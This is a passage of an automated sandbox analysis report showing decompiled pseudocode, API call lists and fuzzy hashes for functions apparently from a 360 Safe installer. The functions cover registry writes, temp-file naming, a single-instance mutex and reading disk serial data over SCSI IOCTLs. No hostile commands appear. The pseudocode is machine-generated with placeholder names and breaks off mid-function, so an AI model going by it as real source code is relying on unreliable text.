                                                                                                                                                                                          0x00cff2b2
                                                                                                                                                                                          0x00cff2b5
                                                                                                                                                                                          0x00cff2ba
                                                                                                                                                                                          0x00cff2c0
                                                                                                                                                                                          0x00cff2c0
                                                                                                                                                                                          0x00cff2c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff2ca
                                                                                                                                                                                          0x00cff2cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff2d1
                                                                                                                                                                                          0x00cff2d1
                                                                                                                                                                                          0x00cff2d3
                                                                                                                                                                                          0x00cff2d4
                                                                                                                                                                                          0x00cff2d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff2d9
                                                                                                                                                                                          0x00cff2df
                                                                                                                                                                                          0x00cff2df
                                                                                                                                                                                          0x00cff2df
                                                                                                                                                                                          0x00cff2d7
                                                                                                                                                                                          0x00cff2e0
                                                                                                                                                                                          0x00cff2e5
                                                                                                                                                                                          0x00cff2f5
                                                                                                                                                                                          0x00cff309
                                                                                                                                                                                          0x00cff311
                                                                                                                                                                                          0x00cff319
                                                                                                                                                                                          0x00cff31e
                                                                                                                                                                                          0x00cff342
                                                                                                                                                                                          0x00cff34a
                                                                                                                                                                                          0x00cff350
                                                                                                                                                                                          0x00cff358
                                                                                                                                                                                          0x00cff35a
                                                                                                                                                                                          0x00cff35c
                                                                                                                                                                                          0x00cff363
                                                                                                                                                                                          0x00cff363
                                                                                                                                                                                          0x00cff367
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff36b
                                                                                                                                                                                          0x00cff37f
                                                                                                                                                                                          0x00cff37f
                                                                                                                                                                                          0x00cff36d
                                                                                                                                                                                          0x00cff36d
                                                                                                                                                                                          0x00cff373
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff375
                                                                                                                                                                                          0x00cff375
                                                                                                                                                                                          0x00cff378
                                                                                                                                                                                          0x00cff37d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff37d
                                                                                                                                                                                          0x00cff373
                                                                                                                                                                                          0x00cff388
                                                                                                                                                                                          0x00cff38a
                                                                                                                                                                                          0x00cff38c
                                                                                                                                                                                          0x00cff393
                                                                                                                                                                                          0x00cff396
                                                                                                                                                                                          0x00cff396
                                                                                                                                                                                          0x00cff398
                                                                                                                                                                                          0x00cff399
                                                                                                                                                                                          0x00cff3b9
                                                                                                                                                                                          0x00cff3b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff38a
                                                                                                                                                                                          0x00cff383
                                                                                                                                                                                          0x00cff385
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff385
                                                                                                                                                                                          0x00cff3bb
                                                                                                                                                                                          0x00cff3bb
                                                                                                                                                                                          0x00cff3c2
                                                                                                                                                                                          0x00cff3c5
                                                                                                                                                                                          0x00cff3c5
                                                                                                                                                                                          0x00cff3c7
                                                                                                                                                                                          0x00cff3c8
                                                                                                                                                                                          0x00cff3e8
                                                                                                                                                                                          0x00cff400
                                                                                                                                                                                          0x00cff400
                                                                                                                                                                                          0x00cff2db
                                                                                                                                                                                          0x00cff2dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFF292
                                                                                                                                                                                            • Part of subcall function 00CFE1A0: _memset.LIBCMT ref: 00CFE1D5
                                                                                                                                                                                            • Part of subcall function 00CFE1A0: _memset.LIBCMT ref: 00CFE27B
                                                                                                                                                                                            • Part of subcall function 00CFE1A0: _strncat.LIBCMT ref: 00CFE2FF
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFF319
                                                                                                                                                                                          • SHSetValueA.SHLWAPI ref: 00CFF34A
                                                                                                                                                                                          • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 00CFF3B9
                                                                                                                                                                                          • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 00CFF3E8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Value$_strncat
                                                                                                                                                                                          • String ID: Software\360Safe\Liveup$mid$mid_old
                                                                                                                                                                                          • API String ID: 2533611499-1528303271
                                                                                                                                                                                          • Opcode ID: cfcad84d26162d4f401ebf7d15d6d7a4c65f3b2715af327a3cf56fc021df5f6a
                                                                                                                                                                                          • Instruction ID: 6b68b75d07ab47ee0d5e1f03c296100e818f4f9a5ec066a83387bd01724327ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfcad84d26162d4f401ebf7d15d6d7a4c65f3b2715af327a3cf56fc021df5f6a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1141E4316083496FE361CB208895FFB7BD9EF85704F08452DE6D987292D7B1960D87A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE94B9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00CE94B9(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v264;
				short _v2312;
				short _v4360;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				int _t36;
				void* _t40;
				intOrPtr _t42;
				void* _t43;
				void* _t50;
				void* _t51;
				signed int _t53;

				_t50 = __edx;
				_t43 = __ecx;
				E00D00E90(0x1104);
				_t17 =  *0xd64070; // 0x8a9e1774
				_v8 = _t17 ^ _t53;
				_t42 = _a4;
				_t51 = 0;
				E00D006A0(0,  &_v4360, 0, 0x800);
				E00D006A0(0,  &_v2312, 0, 0x800);
				GetTempPathW(0x400,  &_v4360);
				E00D006A0(0,  &_v264, 0, 0x100);
				while(1) {
					_push(0x80);
					_push( &_v264);
					E00CC1003(_t42, _t43, _t50, _t51);
					PathCombineW( &_v2312,  &_v4360,  &_v264);
					E00D00ED5( &_v2312, L".tmp");
					_pop(_t43);
					_t36 = PathFileExistsW( &_v2312); // executed
					if(_t36 == 0) {
						break;
					}
					_t51 = _t51 + 1;
					if(_t51 < 0xa) {
						continue;
					} else {
						_t40 = 0;
					}
					L4:
					return E00D0071A(_t40, _t42, _v8 ^ _t53, _t50, _t51, 0x800);
				}
				E00C9ACCC(_t42,  &_v2312);
				_t40 = 1;
				goto L4;
			}


















                                                                                                                                                                                          0x00ce94b9
                                                                                                                                                                                          0x00ce94b9
                                                                                                                                                                                          0x00ce94c1
                                                                                                                                                                                          0x00ce94c6
                                                                                                                                                                                          0x00ce94cd
                                                                                                                                                                                          0x00ce94d1
                                                                                                                                                                                          0x00ce94dc
                                                                                                                                                                                          0x00ce94e6
                                                                                                                                                                                          0x00ce94f4
                                                                                                                                                                                          0x00ce9508
                                                                                                                                                                                          0x00ce951b
                                                                                                                                                                                          0x00ce9523
                                                                                                                                                                                          0x00ce9529
                                                                                                                                                                                          0x00ce952e
                                                                                                                                                                                          0x00ce952f
                                                                                                                                                                                          0x00ce954b
                                                                                                                                                                                          0x00ce955d
                                                                                                                                                                                          0x00ce9563
                                                                                                                                                                                          0x00ce956b
                                                                                                                                                                                          0x00ce9573
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce9575
                                                                                                                                                                                          0x00ce9579
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce957b
                                                                                                                                                                                          0x00ce957b
                                                                                                                                                                                          0x00ce957b
                                                                                                                                                                                          0x00ce957d
                                                                                                                                                                                          0x00ce958b
                                                                                                                                                                                          0x00ce958b
                                                                                                                                                                                          0x00ce9595
                                                                                                                                                                                          0x00ce959c
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE94E6
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE94F4
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00C9BE84), ref: 00CE9508
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE951B
                                                                                                                                                                                            • Part of subcall function 00CC1003: _memset.LIBCMT ref: 00CC1047
                                                                                                                                                                                            • Part of subcall function 00CC1003: CoCreateGuid.OLE32(?,?,?,00000800), ref: 00CC1053
                                                                                                                                                                                            • Part of subcall function 00CC1003: _memset.LIBCMT ref: 00CC1064
                                                                                                                                                                                            • Part of subcall function 00CC1003: _wcsncpy.LIBCMT ref: 00CC10BA
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 00CE954B
                                                                                                                                                                                          • _wcscat.LIBCMT ref: 00CE955D
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00CE956B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                                          • String ID: .tmp
                                                                                                                                                                                          • API String ID: 2935203105-2986845003
                                                                                                                                                                                          • Opcode ID: 2b96591329ff2d8d17f7cb3a15ce466ba7aa2888de4a8f73ff60f69697037db4
                                                                                                                                                                                          • Instruction ID: 7c8525b34ff02ca7c3eb32442e977464510de62eb3023dc2db2d889fe1dc41cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b96591329ff2d8d17f7cb3a15ce466ba7aa2888de4a8f73ff60f69697037db4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 002157B6E0121C6FDB11EBA5DD89FDA77BCEB89300F4004A6B749D3181D975AA848F70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEAB1F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00CEAB1F(void* __ecx, intOrPtr* _a12) {
				void* _v8;
				void* _t7;
				void* _t8;
				struct _CRITICAL_SECTION* _t19;
				void* _t22;

				_push(__ecx);
				_t22 = __ecx; // executed
				_t7 = CreateMutexW(0, 1, L"Q360SafeInstallerMutex"); // executed
				_v8 = _t7;
				if(_t7 == 0) {
					L4:
					_t8 = 0;
					__eflags = 0;
				} else {
					if(GetLastError() != 0xb7) {
						_t4 = _t22 + 0x1c; // 0xd66584
						_t19 = _t4;
						EnterCriticalSection(_t19);
						_t6 = _t22 + 4; // 0xd6656c
						E00CEA9FB(_t6, __eflags,  &_v8);
						LeaveCriticalSection(_t19);
						goto L4;
					} else {
						CloseHandle(_v8);
						 *_a12 = FindWindowW(L"Q360InstallerMainWnd", 0);
						_t8 = 1;
					}
				}
				return _t8;
			}








                                                                                                                                                                                          0x00ceab22
                                                                                                                                                                                          0x00ceab2d
                                                                                                                                                                                          0x00ceab2f
                                                                                                                                                                                          0x00ceab35
                                                                                                                                                                                          0x00ceab3a
                                                                                                                                                                                          0x00ceab88
                                                                                                                                                                                          0x00ceab88
                                                                                                                                                                                          0x00ceab88
                                                                                                                                                                                          0x00ceab3c
                                                                                                                                                                                          0x00ceab47
                                                                                                                                                                                          0x00ceab6a
                                                                                                                                                                                          0x00ceab6a
                                                                                                                                                                                          0x00ceab6e
                                                                                                                                                                                          0x00ceab78
                                                                                                                                                                                          0x00ceab7b
                                                                                                                                                                                          0x00ceab81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceab49
                                                                                                                                                                                          0x00ceab4c
                                                                                                                                                                                          0x00ceab62
                                                                                                                                                                                          0x00ceab66
                                                                                                                                                                                          0x00ceab66
                                                                                                                                                                                          0x00ceab47
                                                                                                                                                                                          0x00ceab8c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,Q360SafeInstallerMutex,00000000,00D66568,?,00C9BC75,Q360InstallerMainWnd,360Installer.exe,?), ref: 00CEAB2F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00CEAB3C
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CEAB4C
                                                                                                                                                                                          • FindWindowW.USER32(Q360InstallerMainWnd,00000000), ref: 00CEAB59
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00D66584,Q360InstallerMainWnd), ref: 00CEAB6E
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D66584,?), ref: 00CEAB81
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateEnterErrorFindHandleLastLeaveMutexWindow
                                                                                                                                                                                          • String ID: Q360InstallerMainWnd$Q360SafeInstallerMutex
                                                                                                                                                                                          • API String ID: 3748036984-533925698
                                                                                                                                                                                          • Opcode ID: 0486818425b3b742be210fa9d433ea132ed1580e4fad9291a60ecd2f43406d23
                                                                                                                                                                                          • Instruction ID: 0bd5d3aaee733e4096eb9df7c99809b6a072e497225dddf8bf710858d513fb3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0486818425b3b742be210fa9d433ea132ed1580e4fad9291a60ecd2f43406d23
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF06276600305FFC7109FE9DC09FAE77B9EB45711F104429F442E62A0DB74AA05DA72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE570 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 598 cfe570-cfe5a8 599 cfe5b0-cfe5ed call c926b0 CreateFileA 598->599 602 cfe6f5-cfe6fd 599->602 603 cfe5f3-cfe5f5 599->603 602->599 605 cfe703-cfe71f call d0071a 602->605 604 cfe600-cfe685 call d006a0 call d03800 DeviceIoControl 603->604 612 cfe6cf-cfe6d4 604->612 613 cfe687-cfe68f 604->613 614 cfe6ea-cfe6f1 FindCloseChangeNotification 612->614 615 cfe6d6-cfe6da 612->615 613->612 616 cfe691 613->616 614->602 615->604 617 cfe6e0 615->617 618 cfe693-cfe6a5 616->618 617->614 618->618 619 cfe6a7-cfe6cd call d005a0 call c927a0 618->619 619->612 624 cfe6e2 619->624 624->614
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00CFE570(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v260;
				char _v722;
				char _v780;
				char _v782;
				intOrPtr _v796;
				intOrPtr _v804;
				intOrPtr _v808;
				char _v816;
				void _v820;
				char _v1844;
				long _v1848;
				intOrPtr _v1852;
				signed int _v1856;
				void* _v1860;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				int _t45;
				signed int _t47;
				void* _t49;
				signed int _t51;
				char _t52;
				void* _t61;
				void* _t62;
				signed int _t65;

				_t65 =  &_v1860;
				_t34 =  *0xd64070; // 0x8a9e1774
				_v4 = _t34 ^ _t65;
				_t51 = 0;
				_t61 = DeviceIoControl;
				_v1852 = _a4;
				_v1860 = 0;
				_v1856 = 0;
				do {
					E00C926B0( &_v260, 0x100, "\\\\.\\Scsi%d:", _t51);
					_t65 = _t65 + 0x10;
					_t59 =  &_v260;
					_t38 = CreateFileA( &_v260, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_t62 = _t38;
					if(_t62 != 0xffffffff) {
						_t52 = 0;
						do {
							E00D006A0(_t61,  &_v820, 0, 0x22d);
							_v820 = 0x1c;
							_v808 = 0x2710;
							_v796 = 0x211;
							_v804 = 0x1b0501;
							E00D03800( &_v816, "SCSIDISK", 8);
							_t65 = _t65 + 0x18;
							_t59 =  &_v1848;
							_v782 = 0xec;
							_v780 = _t52;
							_t45 = DeviceIoControl(_t62, 0x4d008,  &_v820, 0x3c,  &_v820, 0x22d,  &_v1848, 0); // executed
							if(_t45 == 0 || _v722 == 0) {
								L8:
								if(_v1860 == 0) {
									goto L9;
								}
							} else {
								_t47 = 0;
								do {
									 *(_t65 + 0x20 + _t47 * 4) =  *(_t65 + 0x44c + _t47 * 2) & 0x0000ffff;
									_t47 = _t47 + 1;
								} while (_t47 < 0x100);
								_t49 = E00D005A0( &_v1844, 0xa, 0x13);
								_t59 = _v1852;
								_t65 = _t65 + 0xc;
								if(E00C927A0(_v1852, _a8, _t49) >= 0) {
									_v1860 = 1;
								} else {
									goto L8;
								}
							}
							L12:
							FindCloseChangeNotification(_t62); // executed
							_t51 = _v1856;
							goto L13;
							L9:
							_t52 = _t52 + 1;
						} while (_t52 < 2);
						goto L12;
					}
					L13:
					_t51 = _t51 + 1;
					_v1856 = _t51;
				} while (_t51 < 0x10);
				return E00D0071A(_v1860, _t51, _v4 ^ _t65, _t59, _t61, _t62);
			}































                                                                                                                                                                                          0x00cfe570
                                                                                                                                                                                          0x00cfe576
                                                                                                                                                                                          0x00cfe57d
                                                                                                                                                                                          0x00cfe58e
                                                                                                                                                                                          0x00cfe591
                                                                                                                                                                                          0x00cfe597
                                                                                                                                                                                          0x00cfe59b
                                                                                                                                                                                          0x00cfe59f
                                                                                                                                                                                          0x00cfe5b0
                                                                                                                                                                                          0x00cfe5c3
                                                                                                                                                                                          0x00cfe5c8
                                                                                                                                                                                          0x00cfe5da
                                                                                                                                                                                          0x00cfe5e2
                                                                                                                                                                                          0x00cfe5e8
                                                                                                                                                                                          0x00cfe5ed
                                                                                                                                                                                          0x00cfe5f3
                                                                                                                                                                                          0x00cfe600
                                                                                                                                                                                          0x00cfe60f
                                                                                                                                                                                          0x00cfe623
                                                                                                                                                                                          0x00cfe62e
                                                                                                                                                                                          0x00cfe639
                                                                                                                                                                                          0x00cfe644
                                                                                                                                                                                          0x00cfe64b
                                                                                                                                                                                          0x00cfe650
                                                                                                                                                                                          0x00cfe655
                                                                                                                                                                                          0x00cfe672
                                                                                                                                                                                          0x00cfe67a
                                                                                                                                                                                          0x00cfe681
                                                                                                                                                                                          0x00cfe685
                                                                                                                                                                                          0x00cfe6cf
                                                                                                                                                                                          0x00cfe6d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe691
                                                                                                                                                                                          0x00cfe691
                                                                                                                                                                                          0x00cfe693
                                                                                                                                                                                          0x00cfe69b
                                                                                                                                                                                          0x00cfe69f
                                                                                                                                                                                          0x00cfe6a0
                                                                                                                                                                                          0x00cfe6b0
                                                                                                                                                                                          0x00cfe6bc
                                                                                                                                                                                          0x00cfe6c0
                                                                                                                                                                                          0x00cfe6cd
                                                                                                                                                                                          0x00cfe6e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe6cd
                                                                                                                                                                                          0x00cfe6ea
                                                                                                                                                                                          0x00cfe6eb
                                                                                                                                                                                          0x00cfe6f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe6d6
                                                                                                                                                                                          0x00cfe6d6
                                                                                                                                                                                          0x00cfe6d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe6e0
                                                                                                                                                                                          0x00cfe6f5
                                                                                                                                                                                          0x00cfe6f5
                                                                                                                                                                                          0x00cfe6f9
                                                                                                                                                                                          0x00cfe6f9
                                                                                                                                                                                          0x00cfe71f

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C926B0: _vswprintf_s.LIBCMT ref: 00C926E3
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?), ref: 00CFE5E2
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFE60F
                                                                                                                                                                                          • _strncpy.LIBCMT ref: 00CFE64B
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFE681
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CFE6EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memset_strncpy_vswprintf_s
                                                                                                                                                                                          • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                          • API String ID: 2485203684-2176293039
                                                                                                                                                                                          • Opcode ID: f2188c28fb578f45ecae52f5202ed8ed14b0ae757b2ff91b06bd63d6d7265414
                                                                                                                                                                                          • Instruction ID: 07eba0914846e5f60622c5a39379838f1f3807ef13278fab5c3d503ae9ca86f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2188c28fb578f45ecae52f5202ed8ed14b0ae757b2ff91b06bd63d6d7265414
                                                                                                                                                                                          • Instruction Fuzzy Hash: 054180B0608348AAE370DF18DC85BABB7D8EB94704F40091DB788D62D1D7B5A508CB67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEF3A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E00CEF3A8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t24;
				WCHAR* _t29;
				void* _t31;
				void* _t33;
				void* _t35;
				WCHAR* _t37;
				void* _t46;
				void* _t53;
				void* _t54;
				WCHAR* _t73;
				void* _t74;
				void* _t77;
				void* _t79;
				WCHAR* _t80;
				void* _t82;

				_t71 = __edx;
				_t80 = _t82 - 0x7fc;
				_t24 =  *0xd64070; // 0x8a9e1774
				_t80[0x400] = _t24 ^ _t80;
				_push(0xc);
				E00D0155A(0xd37e80, __ebx, __edi, __esi);
				 *(_t80 - 0x18) = _t80[0x406];
				_t29 =  *0xd5d01c; // 0xd5d014
				_t53 = __ecx;
				 *(_t80 - 0x14) = _t29;
				 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
				_t31 = E00CE94B9(__ecx, __edx, _t80 - 0x14); // executed
				if(_t31 != 0) {
					_t73 =  *(_t80 - 0x14);
					DeleteFileW(_t73); // executed
					_t33 = E00CEEF14(_t53, _t73); // executed
					__eflags = _t33;
					if(_t33 == 0) {
						goto L1;
					}
					_t37 =  *0xd5d01c; // 0xd5d014
					 *(_t80 - 0x10) = _t37;
					 *(_t80 - 4) = 1;
					E00D006A0(_t73, _t80, 0, 0x800);
					GetTempPathW(0x400, _t80);
					E00C9ACCC(_t80 - 0x10, _t80);
					E00C9CA59(_t80 - 0x10, L"{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp");
					E00CEF1C5(_t53, _t53, _t71, _t73, DeleteFileW, __eflags,  *(_t80 - 0x10));
					__imp__#165(0,  *(_t80 - 0x10)); // executed
					_t46 = L00CEF021(_t73,  *(_t80 - 0x10));
					__eflags = _t46;
					if(_t46 != 0) {
						E00C9CCC5( *(_t80 - 0x18), _t80, _t80 - 0x10);
						DeleteFileW(_t73); // executed
						_t79 = 1;
					} else {
						_t79 = 0;
						__eflags = 0;
					}
					E00C9820F(_t80 - 0x10);
					E00C9820F(_t80 - 0x14);
					_t35 = _t79;
					L2:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
					_pop(_t74);
					_pop(_t77);
					_pop(_t54);
